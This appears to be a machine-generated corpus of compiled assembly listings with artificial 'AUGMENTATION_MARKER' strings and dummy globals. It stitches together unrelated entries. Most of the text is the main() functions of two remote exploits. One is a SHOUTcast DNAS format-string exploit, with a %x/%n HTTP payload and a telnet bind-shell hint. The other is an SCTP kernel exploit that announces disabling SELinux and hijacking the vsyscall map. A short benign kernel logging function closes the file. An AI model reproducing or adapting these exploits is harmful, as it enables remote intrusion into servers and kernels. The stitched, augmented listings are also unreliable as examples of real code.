.file "extr_712.c_main_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC1: .string ".mp3 HTTP/1.0\r\n\r\n" .align 3 .LC2: .string "SHOUTcast DNAS/Linux v1.9.4 format string remote exploit by pucik www.CC-Team.org" .align 3 .LC3: .string "Usage: %s <host>\n" .align 3 .LC4: .string "Cannot get IP of %s, %s!\n" .align 3 .LC5: .string "Cannot connect to %s, %s!\n" .align 3 .LC6: .string "[*] Sending first request ..." .align 3 .LC7: .string "[*] Sending second request ..." .align 3 .LC8: .ascii "GET /content/%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%" .ascii "x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .ascii "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .ascii "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .string "AAAAAAA-%n-AAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-%n.mp3 HTTP/1.0\r\n\r\n" .align 3 .LC9: .string "[*] Try telnet %s 7000 :)\n" .align 3 .LC0: .string "GET /content/AA<I\006\b=I\006\b>I\006\b?I\006\b" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-1120 sd s4,1072(sp) la s4,__stack_chk_guard ld a5, 0(s4) sd a5, 1048(sp) li a5, 0 lw a5,.LANCHOR0 sd s2,1088(sp) addi s2,sp,24 addiw a5,a5,1 sd s1,1096(sp) sd s3,1080(sp) li a2,32 mv s3,a0 mv s1,a1 mv a0,s2 lla a1,.LC0 sw a5,.LANCHOR0,a4 sd ra,1112(sp) sd s0,1104(sp) sd s5,1064(sp) sd s6,1056(sp) call memcpy@plt li a2,992 li a1,0 addi a0,sp,56 call memset@plt lla s0,.LANCHOR1 ld a1,0(s0) mv a0,s2 call strcat@plt lla a1,.LC1 mv a0,s2 call strcat@plt lla a0,.LC2 call puts@plt li a5,2 ble s3,a5,.L12 .L2: ld s5,8(s1) mv a0,s5 call gethostbyname@plt mv s3,a0 beq a0,zero,.L13 .L3: lw a1,16(s0) lw a0,20(s0) li a2,0 addi s6,sp,8 call socket@plt ld a5,0(s3) lw a4,20(s0) mv s1,a0 lw a5,0(a5) lw a0,24(s0) sw a4,12(sp) sw a5,16(sp) call htons@plt mv a5,a0 li a2,4 mv a1,s6 mv a0,s1 sw a5,8(sp) call connect@plt li a5,-1 beq a0,a5,.L14 .L4: lla a0,.LC6 call puts@plt mv a0,s2 call strlen@plt mv a2,a0 mv a1,s2 mv a0,s1 call write@plt mv a0,s1 call close@plt lw a1,16(s0) lw a0,20(s0) li a2,0 call socket@plt li a2,4 mv a1,s6 mv s1,a0 call connect@plt li a5,-1 beq a0,a5,.L15 .L5: lla a0,.LC7 call puts@plt lla a0,.LC8 call strlen@plt mv a2,a0 lla a1,.LC8 mv a0,s1 call write@plt mv a0,s1 call close@plt mv a1,s5 lla a0,.LC9 call printf@plt sw zero,4(sp) lw a4,4(sp) li a5,4 bgt a4,a5,.L6 li a4,4 .L7: lw a5,4(sp) addiw a5,a5,1 sw a5,4(sp) lw a5,4(sp) ble a5,a4,.L7 .L6: ld a4, 1048(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L16 ld ra,1112(sp) ld s0,1104(sp) ld s1,1096(sp) ld s2,1088(sp) ld s3,1080(sp) ld s4,1072(sp) ld s5,1064(sp) ld s6,1056(sp) li a0,0 addi sp,sp,1120 jr ra .L12: ld a1,0(s1) lla a0,.LC3 call printf@plt li a0,0 call exit@plt j .L2 .L15: lw a0,12(s0) lw s0,8(s0) call strerror@plt mv a3,a0 mv a2,s5 lla a1,.LC5 mv a0,s0 call fprintf@plt li a0,-1 call exit@plt j .L5 .L14: lw a0,12(s0) lw s3,8(s0) call strerror@plt mv a3,a0 mv a2,s5 lla a1,.LC5 mv a0,s3 call fprintf@plt li a0,-1 call exit@plt j .L4 .L13: lw a0,12(s0) lw s1,8(s0) call strerror@plt mv a3,a0 mv a2,s5 lla a1,.LC4 mv a0,s1 call fprintf@plt li a0,-1 call exit@plt j .L3 .L16: call __stack_chk_fail@plt .size main, .-main .globl stderr .globl shellcode .globl errno .globl SOCK_STREAM .globl PORT .globl PF_INET .globl g_aug_volatile_9499 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_9499, @object .size g_aug_volatile_9499, 4 g_aug_volatile_9499: .word 5 .bss .align 3 .set .LANCHOR1,. + 0 .type shellcode, @object .size shellcode, 8 shellcode: .zero 8 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type errno, @object .size errno, 4 errno: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .type PORT, @object .size PORT, 4 PORT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_8556.c_main_aug_v3_7
.file "extr_8556.c_main_aug_v3_7.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "AUGMENTATION_MARKER: Hello from augmentation!" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "aug_volatile_var_2565" .section .rodata.str1.8 .align 8 .LC2: .string "AUGMENTATION_MARKER: Volatile var %s is %%d\n" .section .rodata.str1.1 .LC3: .string "setsockopt: SO_REUSEADDR" .LC4: .string "bind: sock" .LC5: .string "listen: sock" .section .rodata.str1.8 .align 8 .LC6: .string "socket: RAW/SCTP montitor socket" .align 8 .LC7: .string "[**] Monitoring Network for TSN/VTAG pairs.. \n" .section .rodata.str1.1 .LC8: .string "clone" .section .rodata.str1.8 .align 8 .LC9: .string "[**] Start flushing slub cache...\n" .align 8 .LC10: .string "[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n" .align 8 .LC11: .string "[**] Overwriting neightboard sctp map..\n" .section .rodata.str1.1 .LC12: .string "Error Building Streams..." .section .rodata.str1.8 .align 8 .LC13: .string "[**] Disabling Selinux Enforcing Mode..\n" .align 8 .LC14: .string "[**] Overwriting neightboard sctp map ......\n" .align 8 .LC15: .string "[**] Overwriting vsyscall shadow map..\n" .align 8 .LC16: .string "[**] Hijacking vsyscall shadow map..\n" .align 8 .LC17: .string "VTAG/TSN not found: network error" .section .rodata.str1.1 .LC18: .string "[**] Closing Connection... \n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB24: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movl %edi, %ebp leaq .LC0(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 subq $56, %rsp .cfi_def_cfa_offset 96 movq %fs:40, %rax movq %rax, 40(%rsp) movl g_aug_volatile_2801(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_2801(%rip) call puts@PLT movl $435, (%rsp) movl (%rsp), %eax leaq .LC1(%rip), %rdx leaq .LC2(%rip), %rsi movl $1, %edi subl $1, %eax movl %eax, (%rsp) movl (%rsp), %ecx xorl %eax, %eax call __printf_chk@PLT movq %r12, %rsi movl %ebp, %edi movl $1, 4(%rsp) call sctp_getopt@PLT movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq PF_INET(%rip), %rdi call socket@PLT movl SO_REUSEADDR(%rip), %edx leaq 4(%rsp), %rcx movl SOL_SOCKET(%rip), %esi movl $4, %r8d movl %eax, %edi movl %eax, %r12d call setsockopt@PLT testq %rax, %rax js .L40 .L2: movq PF_INET(%rip), %rax movl 12+h(%rip), %edi movq %rax, 32(%rsp) call htons@PLT movl 16+h(%rip), %edi movq %rax, 24(%rsp) call inet_addr@PLT leaq 16(%rsp), %rsi movl $24, %edx movl %r12d, %edi movq %rax, 16(%rsp) call bind@PLT testq %rax, %rax js .L41 .L3: movl $4, %esi movl %r12d, %edi call listen@PLT testq %rax, %rax js .L42 .L4: movl 16+h(%rip), %edi call inet_addr@PLT movl 12+h(%rip), %edi movl %eax, 8(%rsp) call htons@PLT leaq 12(%rsp), %rsi movl $2, %edx movl %eax, 12(%rsp) movq k(%rip), %rax movq 72(%rax), %rdi addq 40(%rax), %rdi call memcpy@PLT leaq 8(%rsp), %rsi movl $4, %edx movq k(%rip), %rax movq 64(%rax), %rdi addq 40(%rax), %rdi call memcpy@PLT movl IPPROTO_SCTP(%rip), %edx movl SOCK_RAW(%rip), %esi movq PF_INET(%rip), %rdi call socket@PLT movq %rax, raw_sctp(%rip) testq %rax, %rax js .L43 .L5: movq PF_INET(%rip), %rax movl 4+h(%rip), %edi movq %rax, 16+server_sctp(%rip) call htons@PLT movl 8+h(%rip), %edi movq %rax, 8+server_sctp(%rip) call inet_addr@PLT leaq .LC7(%rip), %rdi movq %rax, server_sctp(%rip) call __msg@PLT movq STACK_SIZE(%rip), %rsi movl clone_thread(%rip), %edi xorl %ecx, %ecx addq clone_stack(%rip), %rsi movl CLONE_VM(%rip), %edx subq $8, %rsi orl SIGCHLD(%rip), %edx call clone@PLT testl %eax, %eax js .L44 .L6: movl $1, %edi xorl %ebx, %ebx leaq h(%rip), %rbp call sleep@PLT leaq .LC9(%rip), %rdi call __msg@PLT movl h(%rip), %eax testl %eax, %eax jns .L7 jmp .L13 .p2align 4,,10 .p2align 3 .L11: xorl %edx, %edx addl $1, %ebx call make_sctp_connection@PLT movl 0(%rbp), %eax cmpl %ebx, %eax jl .L13 .L7: movl sport(%rip), %edx movl 4+h(%rip), %esi movl %edx, %ecx subl %eax, %ecx leal 1(%rcx,%rbx), %edi cmpl %edi, %edx je .L10 cmpl %edi, sport2(%rip) jne .L11 .L10: movl $1, %edx addl $1, %ebx call make_sctp_connection@PLT movl 0(%rbp), %eax cmpl %ebx, %eax jge .L7 .L13: xorl %eax, %eax call disable_abort@PLT xorl %edi, %edi call wait@PLT movq k(%rip), %rax movq SLAB_ALLOCATOR(%rip), %rbx cmpq %rbx, (%rax) je .L45 .L9: movq vtag(%rip), %rdx testq %rdx, %rdx je .L14 movq tsn(%rip), %rsi testq %rsi, %rsi jne .L46 .L14: leaq .LC17(%rip), %rdi call __fatal@PLT .L21: movl %r12d, %edi call multiplex@PLT leaq .LC18(%rip), %rdi call __msg@PLT movq 40(%rsp), %rax subq %fs:40, %rax jne .L47 addq $56, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L46: .cfi_restore_state movq vtag2(%rip), %r8 testq %r8, %r8 je .L14 movq tsn2(%rip), %rcx testq %rcx, %rcx je .L14 leaq .LC10(%rip), %rdi call __msg_f@PLT movl $1, %edi call sleep@PLT movq k(%rip), %rax cmpq $0, 56(%rax) jne .L48 .L15: leaq .LC14(%rip), %rdi call __msg@PLT movq k(%rip), %rcx movl $2, %esi movl 8(%rcx), %eax subl 12(%rcx), %eax cltd movq 48(%rcx), %rdi idivl %esi movl 16(%rcx), %esi movl %eax, %edx call build_stream@PLT movl %eax, %r13d testl %eax, %eax js .L49 .L18: movl streams(%rip), %edi movl %r13d, %esi call htons_streams@PLT movq tsn(%rip), %r9 movl %r13d, %ecx movq vtag(%rip), %r8 movl streams(%rip), %edx movl 4+h(%rip), %esi movl sport(%rip), %edi call send_fwd_chunk@PLT leaq .LC15(%rip), %rdi call __msg@PLT movq k(%rip), %rax movl $1176, %edx movl 20(%rax), %esi movq 40(%rax), %rdi call build_stream@PLT movl %eax, %r13d testl %eax, %eax js .L50 .L19: movl streams(%rip), %edi movl %r13d, %esi call htons_streams@PLT movq tsn2(%rip), %r9 movl %r13d, %ecx movq vtag2(%rip), %r8 movl streams(%rip), %edx movl 4+h(%rip), %esi movl sport2(%rip), %edi call send_fwd_chunk@PLT leaq .LC16(%rip), %rdi call __msg@PLT movq k(%rip), %rax xorl %edx, %edx movl 24(%rax), %esi movq 32(%rax), %rdi call build_stream@PLT movl %eax, %r13d testl %eax, %eax js .L51 .L20: movl streams(%rip), %edi movl %r13d, %esi call htons_streams@PLT movq tsn2(%rip), %r9 movl %r13d, %ecx movq vtag2(%rip), %r8 movl streams(%rip), %edx movl 4+h(%rip), %esi movl sport2(%rip), %edi call send_fwd_chunk@PLT movl $1, %edi call sleep@PLT jmp .L21 .L44: leaq .LC8(%rip), %rdi call __fatal_perror@PLT jmp .L6 .L43: leaq .LC6(%rip), %rdi call __fatal_perror@PLT jmp .L5 .L42: leaq .LC5(%rip), %rdi call __fatal_perror@PLT jmp .L4 .L41: leaq .LC4(%rip), %rdi call __fatal_perror@PLT jmp .L3 .L40: leaq .LC3(%rip), %rdi call __fatal_perror@PLT jmp .L2 .L45: xorl %eax, %eax call swap_to_SLAB_chunk@PLT jmp .L9 .L48: leaq .LC11(%rip), %rdi call __msg@PLT movq k(%rip), %rcx movl $2, %esi movl 8(%rcx), %eax subl 12(%rcx), %eax cltd movq 56(%rcx), %rdi idivl %esi movl 16(%rcx), %esi movl %eax, %edx call build_stream@PLT movl %eax, %r13d testl %eax, %eax js .L52 .L16: movl streams(%rip), %edi movl %r13d, %esi call htons_streams@PLT movq tsn(%rip), %r9 movl %r13d, %ecx movq vtag(%rip), %r8 movl streams(%rip), %edx movl 4+h(%rip), %esi movl sport(%rip), %edi call send_fwd_chunk@PLT leaq .LC13(%rip), %rdi call __msg@PLT movq __zero(%rip), %rdi xorl %edx, %edx movl $4, %esi call build_stream@PLT movl %eax, %r13d testl %eax, %eax js .L53 .L17: movl streams(%rip), %edi movl %r13d, %esi call htons_streams@PLT movq tsn2(%rip), %r9 movl %r13d, %ecx movq vtag2(%rip), %r8 movl streams(%rip), %edx movl 4+h(%rip), %esi movl sport2(%rip), %edi call send_fwd_chunk@PLT jmp .L15 .L51: leaq .LC12(%rip), %rdi call __fatal@PLT jmp .L20 .L50: leaq .LC12(%rip), %rdi call __fatal@PLT jmp .L19 .L49: leaq .LC12(%rip), %rdi call __fatal@PLT jmp .L18 .L53: leaq .LC12(%rip), %rdi call __fatal@PLT jmp .L17 .L52: leaq .LC12(%rip), %rdi call __fatal@PLT jmp .L16 .L47: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size main, .-main .globl vtag2 .bss .align 8 .type vtag2, @object .size vtag2, 8 vtag2: .zero 8 .globl vtag .align 8 .type vtag, @object .size vtag, 8 vtag: .zero 8 .globl tsn2 .align 8 .type tsn2, @object .size tsn2, 8 tsn2: .zero 8 .globl tsn .align 8 .type tsn, @object .size tsn, 8 tsn: .zero 8 .globl streams .align 4 .type streams, @object .size streams, 4 streams: .zero 4 .globl sport2 .align 4 .type sport2, @object .size sport2, 4 sport2: .zero 4 .globl sport .align 4 .type sport, @object .size sport, 4 sport: .zero 4 .globl server_sctp .align 16 .type server_sctp, @object .size server_sctp, 24 server_sctp: .zero 24 .globl raw_sctp .align 8 .type raw_sctp, @object .size raw_sctp, 8 raw_sctp: .zero 8 .globl k .align 8 .type k, @object .size k, 8 k: .zero 8 .globl h .align 16 .type h, @object .size h, 20 h: .zero 20 .globl clone_thread .align 4 .type clone_thread, @object .size clone_thread, 4 clone_thread: .zero 4 .globl clone_stack .align 8 .type clone_stack, @object .size clone_stack, 8 clone_stack: .zero 8 .globl __zero .align 8 .type __zero, @object .size __zero, 8 __zero: .zero 8 .globl STACK_SIZE .align 8 .type STACK_SIZE, @object .size STACK_SIZE, 8 STACK_SIZE: .zero 8 .globl SO_REUSEADDR .align 4 .type SO_REUSEADDR, @object .size SO_REUSEADDR, 4 SO_REUSEADDR: .zero 4 .globl SOL_SOCKET .align 4 .type SOL_SOCKET, @object .size SOL_SOCKET, 4 SOL_SOCKET: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SOCK_RAW .align 4 .type SOCK_RAW, @object .size SOCK_RAW, 4 SOCK_RAW: .zero 4 .globl SLAB_ALLOCATOR .align 8 .type SLAB_ALLOCATOR, @object .size SLAB_ALLOCATOR, 8 SLAB_ALLOCATOR: .zero 8 .globl SIGCHLD .align 4 .type SIGCHLD, @object .size SIGCHLD, 4 SIGCHLD: .zero 4 .globl PF_INET .align 8 .type PF_INET, @object .size PF_INET, 8 PF_INET: .zero 8 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl IPPROTO_SCTP .align 4 .type IPPROTO_SCTP, @object .size IPPROTO_SCTP, 4 IPPROTO_SCTP: .zero 4 .globl CLONE_VM .align 4 .type CLONE_VM, @object .size CLONE_VM, 4 CLONE_VM: .zero 4 .globl g_aug_volatile_2801 .data .align 4 .type g_aug_volatile_2801, @object .size g_aug_volatile_2801, 4 g_aug_volatile_2801: .long 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_8556.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "AUGMENTATION_MARKER: Hello from augmentation!" .align 3 .LC1: .string "aug_volatile_var_2565" .align 3 .LC2: .string "AUGMENTATION_MARKER: Volatile var %s is %%d\n" .align 3 .LC3: .string "setsockopt: SO_REUSEADDR" .align 3 .LC4: .string "bind: sock" .align 3 .LC5: .string "listen: sock" .align 3 .LC6: .string "socket: RAW/SCTP montitor socket" .align 3 .LC7: .string "[**] Monitoring Network for TSN/VTAG pairs.. \n" .align 3 .LC8: .string "clone" .align 3 .LC9: .string "[**] Start flushing slub cache...\n" .align 3 .LC10: .string "[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n" .align 3 .LC11: .string "[**] Overwriting neightboard sctp map..\n" .align 3 .LC12: .string "Error Building Streams..." .align 3 .LC13: .string "[**] Disabling Selinux Enforcing Mode..\n" .align 3 .LC14: .string "[**] Overwriting neightboard sctp map ......\n" .align 3 .LC15: .string "[**] Overwriting vsyscall shadow map..\n" .align 3 .LC16: .string "[**] Hijacking vsyscall shadow map..\n" .align 3 .LC17: .string "VTAG/TSN not found: network error" .align 3 .LC18: .string "[**] Closing Connection... \n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 sd s3,56(sp) la s3,__stack_chk_guard ld a5, 0(s3) sd a5, 40(sp) li a5, 0 lw a5,.LANCHOR0 sd s1,72(sp) addiw a5,a5,1 mv s1,a0 lla a0,.LC0 sd ra,88(sp) sd s0,80(sp) sd s2,64(sp) sw a5,.LANCHOR0,a4 mv s2,a1 call puts@plt li a5,435 sw a5,0(sp) lw a5,0(sp) lla a2,.LC1 lla a1,.LC2 addiw a5,a5,-1 sw a5,0(sp) lw a3,0(sp) li a0,1 lla s0,.LANCHOR1 call __printf_chk@plt mv a1,s2 li a5,1 mv a0,s1 sw a5,4(sp) call sctp_getopt@plt lw a2,0(s0) lw a1,4(s0) ld a0,8(s0) call socket@plt lw a2,16(s0) lw a1,20(s0) sext.w s2,a0 li a4,4 addi a3,sp,4 mv a0,s2 call setsockopt@plt blt a0,zero,.L43 .L2: ld a5,8(s0) lw a0,36(s0) sd a5,32(sp) call htons@plt mv a5,a0 lw a0,40(s0) sd a5,24(sp) call inet_addr@plt mv a5,a0 li a2,24 addi a1,sp,16 mv a0,s2 sd a5,16(sp) call bind@plt blt a0,zero,.L44 .L3: li a1,4 mv a0,s2 call listen@plt blt a0,zero,.L45 .L4: lw a0,40(s0) call inet_addr@plt mv a5,a0 lw a0,36(s0) sw a5,8(sp) call htons@plt ld a5,48(s0) li a2,2 addi a1,sp,12 ld a4,40(a5) ld a5,72(a5) sw a0,12(sp) add a0,a4,a5 call memcpy@plt ld a5,48(s0) li a2,4 addi a1,sp,8 ld a0,40(a5) ld a5,64(a5) add a0,a0,a5 call memcpy@plt lw a2,56(s0) lw a1,60(s0) ld a0,8(s0) call socket@plt sd a0,64(s0) blt a0,zero,.L46 .L5: ld a5,8(s0) lw a0,28(s0) sd a5,88(s0) call htons@plt mv a5,a0 lw a0,32(s0) sd a5,80(s0) call inet_addr@plt mv a5,a0 lla a0,.LC7 sd a5,72(s0) call __msg@plt ld a1,104(s0) ld a4,112(s0) lw a2,96(s0) lw a5,100(s0) lw a0,120(s0) add a1,a1,a4 li a3,0 or a2,a2,a5 addi a1,a1,-8 call clone@plt blt a0,zero,.L47 .L6: li a0,1 call sleep@plt lla a0,.LC9 call __msg@plt lw a0,24(s0) li s1,0 bge a0,zero,.L7 j .L13 .L11: li a2,0 call make_sctp_connection@plt lw a0,24(s0) addiw s1,s1,1 blt a0,s1,.L13 .L7: lw a5,136(s0) addiw a0,a0,-1 lw a1,28(s0) subw a0,a5,a0 addw a0,a0,s1 beq a5,a0,.L10 lw a5,140(s0) bne a5,a0,.L11 .L10: li a2,1 call make_sctp_connection@plt lw a0,24(s0) addiw s1,s1,1 bge a0,s1,.L7 .L13: call disable_abort@plt li a0,0 call wait@plt ld a4,48(s0) ld a5,128(s0) ld a4,0(a4) beq a4,a5,.L48 .L9: ld a2,144(s0) beq a2,zero,.L14 ld a1,152(s0) bne a1,zero,.L49 .L14: lla a0,.LC17 call __fatal@plt .L21: mv a0,s2 call multiplex@plt lla a0,.LC18 call __msg@plt ld a4, 40(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L50 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) li a0,0 addi sp,sp,96 jr ra .L49: ld a4,160(s0) beq a4,zero,.L14 ld a3,168(s0) beq a3,zero,.L14 lla a0,.LC10 call __msg_f@plt li a0,1 call sleep@plt ld a5,48(s0) ld a5,56(a5) bne a5,zero,.L51 .L15: lla a0,.LC14 call __msg@plt ld a5,48(s0) li a2,2 lw a4,8(a5) lw a3,12(a5) lw a1,16(a5) ld a0,48(a5) subw a4,a4,a3 divw a2,a4,a2 call build_stream@plt mv s1,a0 blt a0,zero,.L52 .L18: lw a0,176(s0) mv a1,s1 call htons_streams@plt ld a5,152(s0) ld a4,144(s0) lw a2,176(s0) lw a1,28(s0) lw a0,136(s0) mv a3,s1 call send_fwd_chunk@plt lla a0,.LC15 call __msg@plt ld a5,48(s0) li a2,1176 lw a1,20(a5) ld a0,40(a5) call build_stream@plt mv s1,a0 blt a0,zero,.L53 .L19: lw a0,176(s0) mv a1,s1 call htons_streams@plt ld a5,168(s0) ld a4,160(s0) lw a2,176(s0) lw a1,28(s0) lw a0,140(s0) mv a3,s1 call send_fwd_chunk@plt lla a0,.LC16 call __msg@plt ld a5,48(s0) li a2,0 lw a1,24(a5) ld a0,32(a5) call build_stream@plt mv s1,a0 blt a0,zero,.L54 .L20: lw a0,176(s0) mv a1,s1 call htons_streams@plt ld a5,168(s0) ld a4,160(s0) lw a2,176(s0) lw a1,28(s0) lw a0,140(s0) mv a3,s1 call send_fwd_chunk@plt li a0,1 call sleep@plt j .L21 .L47: lla a0,.LC8 call __fatal_perror@plt j .L6 .L46: lla a0,.LC6 call __fatal_perror@plt j .L5 .L45: lla a0,.LC5 call __fatal_perror@plt j .L4 .L44: lla a0,.LC4 call __fatal_perror@plt j .L3 .L43: lla a0,.LC3 call __fatal_perror@plt j .L2 .L48: call swap_to_SLAB_chunk@plt j .L9 .L51: lla a0,.LC11 call __msg@plt ld a5,48(s0) li a2,2 lw a4,8(a5) lw a3,12(a5) lw a1,16(a5) ld a0,56(a5) subw a4,a4,a3 divw a2,a4,a2 call build_stream@plt mv s1,a0 blt a0,zero,.L55 .L16: lw a0,176(s0) mv a1,s1 call htons_streams@plt ld a5,152(s0) ld a4,144(s0) lw a2,176(s0) lw a1,28(s0) lw a0,136(s0) mv a3,s1 call send_fwd_chunk@plt lla a0,.LC13 call __msg@plt ld a0,184(s0) li a2,0 li a1,4 call build_stream@plt mv s1,a0 blt a0,zero,.L56 .L17: lw a0,176(s0) mv a1,s1 call htons_streams@plt ld a5,168(s0) ld a4,160(s0) lw a2,176(s0) lw a1,28(s0) lw a0,140(s0) mv a3,s1 call send_fwd_chunk@plt j .L15 .L54: lla a0,.LC12 call __fatal@plt j .L20 .L53: lla a0,.LC12 call __fatal@plt j .L19 .L52: lla a0,.LC12 call __fatal@plt j .L18 .L56: lla a0,.LC12 call __fatal@plt j .L17 .L55: lla a0,.LC12 call __fatal@plt j .L16 .L50: call __stack_chk_fail@plt .size main, .-main .globl vtag2 .globl vtag .globl tsn2 .globl tsn .globl streams .globl sport2 .globl sport .globl server_sctp .globl raw_sctp .globl k .globl h .globl clone_thread .globl clone_stack .globl __zero .globl STACK_SIZE .globl SO_REUSEADDR .globl SOL_SOCKET .globl SOCK_STREAM .globl SOCK_RAW .globl SLAB_ALLOCATOR .globl SIGCHLD .globl PF_INET .globl IPPROTO_TCP .globl IPPROTO_SCTP .globl CLONE_VM .globl g_aug_volatile_2801 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_2801, @object .size g_aug_volatile_2801, 4 g_aug_volatile_2801: .word 4 .bss .align 3 .set .LANCHOR1,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type PF_INET, @object .size PF_INET, 8 PF_INET: .zero 8 .type SO_REUSEADDR, @object .size SO_REUSEADDR, 4 SO_REUSEADDR: .zero 4 .type SOL_SOCKET, @object .size SOL_SOCKET, 4 SOL_SOCKET: .zero 4 .type h, @object .size h, 20 h: .zero 20 .zero 4 .type k, @object .size k, 8 k: .zero 8 .type IPPROTO_SCTP, @object .size IPPROTO_SCTP, 4 IPPROTO_SCTP: .zero 4 .type SOCK_RAW, @object .size SOCK_RAW, 4 SOCK_RAW: .zero 4 .type raw_sctp, @object .size raw_sctp, 8 raw_sctp: .zero 8 .type server_sctp, @object .size server_sctp, 24 server_sctp: .zero 24 .type CLONE_VM, @object .size CLONE_VM, 4 CLONE_VM: .zero 4 .type SIGCHLD, @object .size SIGCHLD, 4 SIGCHLD: .zero 4 .type clone_stack, @object .size clone_stack, 8 clone_stack: .zero 8 .type STACK_SIZE, @object .size STACK_SIZE, 8 STACK_SIZE: .zero 8 .type clone_thread, @object .size clone_thread, 4 clone_thread: .zero 4 .zero 4 .type SLAB_ALLOCATOR, @object .size SLAB_ALLOCATOR, 8 SLAB_ALLOCATOR: .zero 8 .type sport, @object .size sport, 4 sport: .zero 4 .type sport2, @object .size sport2, 4 sport2: .zero 4 .type vtag, @object .size vtag, 8 vtag: .zero 8 .type tsn, @object .size tsn, 8 tsn: .zero 8 .type vtag2, @object .size vtag2, 8 vtag2: .zero 8 .type tsn2, @object .size tsn2, 8 tsn2: .zero 8 .type streams, @object .size streams, 4 streams: .zero 4 .zero 4 .type __zero, @object .size __zero, 8 __zero: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_olpc-xo175-ec.c_olpc_xo175_ec_flush_logbuf_aug_v3_1
.file "extr_olpc-xo175-ec.c_olpc_xo175_ec_flush_logbuf_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "got debug string [%*pE]\n" .text .p2align 4 .type olpc_xo175_ec_flush_logbuf, @function olpc_xo175_ec_flush_logbuf: .LFB25: .cfi_startproc endbr64 pushq %rbx .cfi_def_cfa_offset 16 .cfi_offset 3, -16 movq %rdi, %rbx movl 8(%rdi), %ecx leaq .LC0(%rip), %rsi movq (%rbx), %rdx movq 16(%rdi), %rdi call dev_dbg@PLT movq $0, (%rbx) popq %rbx .cfi_def_cfa_offset 8 ret .cfi_endproc .LFE25: .size olpc_xo175_ec_flush_logbuf, .-olpc_xo175_ec_flush_logbuf .globl g_aug_volatile_8171 .data .align 4 .type g_aug_volatile_8171, @object .size g_aug_volatile_8171, 4 g_aug_volatile_8171: .long 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
